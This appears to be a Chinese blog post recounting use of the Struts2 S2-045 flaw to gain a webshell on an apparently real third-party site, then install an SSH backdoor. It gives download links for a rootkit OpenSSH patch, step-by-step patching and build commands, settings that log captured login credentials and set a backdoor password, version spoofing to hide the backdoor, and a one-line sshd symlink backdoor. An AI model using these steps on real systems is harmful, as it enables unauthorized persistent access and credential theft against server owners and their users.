STR2-045的简单利用

str2-045已经过去一段时间了,现在修复得也差不多了,就将之前做的一些东西简单记录一下。

原理什么的就不解释了

WebShell

找了个vn站点进行测试。

tomcat这种中间组件大都是root权限运行,但是也有少数限制了权限。

当然,去看了看,已经发现有前辈在前面开路了。

然后就是上传脚本进行巩固权限。

当然也可以直接转发出来开搞。

1
2
uname -a
Linux ubuntu 3.19.0-26-generic #28~14.04.1-Ubuntu SMP Wed Aug 12 14:09:17 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux

因为已经不需要提权了,所以看看有什么收获。
弄着弄着网络就出问题了。

SSH后门

1
2
3
[/home/sysadmin/]$ ssh -V
OpenSSH_6.6.1p1 Ubuntu-2ubuntu2.8, OpenSSL 1.0.1f 6 Jan 2014

先记录好原来ssh的版本信息,在后面有用

然后进行常规的ssh后门的安装

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
http://core.ipsecs.com/rootkit/patch-to-hack/0x06-openssh-5.9p1.patch.tar.gz
http://ftp.vim.org/security/OpenSSH/openssh-5.9p1.tar.gz
tar zxvf openssh-5.9p1.tar.gz
tar zxvf 0x06-openssh-5.9p1.patch.tar.gz
cd openssh-5.9p1.patch/
cp sshbd5.9p1.diff ../openssh-5.9p1
cd ../openssh-5.9p1
patch < sshbd5.9p1.diff //patch 后门
执行vi includes.h
+#define ILOG "/tmp/ilog" //记录登录到本机的用户名和密码
+#define OLOG "/tmp/olog" //记录本机登录到远程的用户名和密码
+#define SECRETPW "123456654321" //你后门的密码
执行vi version.h
#define SSH_VERSION "填入之前记下来的版本号,伪装原版本"
#define SSH_PORTABLE "小版本号"
./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5

到了这里出现

1
注意要是出现:configure: error: *** zlib.h missing – please install first or check config.log

这是没有提前装好环境的原因
使用命令:

1
2
sudo apt-get install zlib1g
sudo apt-get install zlib1g.dev

如果提示E: 无法获得锁 /var/lib/apt/lists/lock - open

那就是因为apt-get程序被占用了。使用sudo killall apt-get,杀掉进程再进行安装。
如果提示

1
configure: error: *** OpenSSL headers missing - please install first or check config.log ***

那就执行apt-get install libssl-dev

如果提示configure: error: PAM headers not found
那就执行apt-get install libpam0g-dev

但是在装依赖的时候出现问题,无法解决。

没装有PAM。
当然也可以快速获取一个ssh后门,但是缺点也很明显。

1
ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=8888

然后就没继续了。。。。。(尴尬)

!坚持技术分享,您的支持将鼓励我继续创作!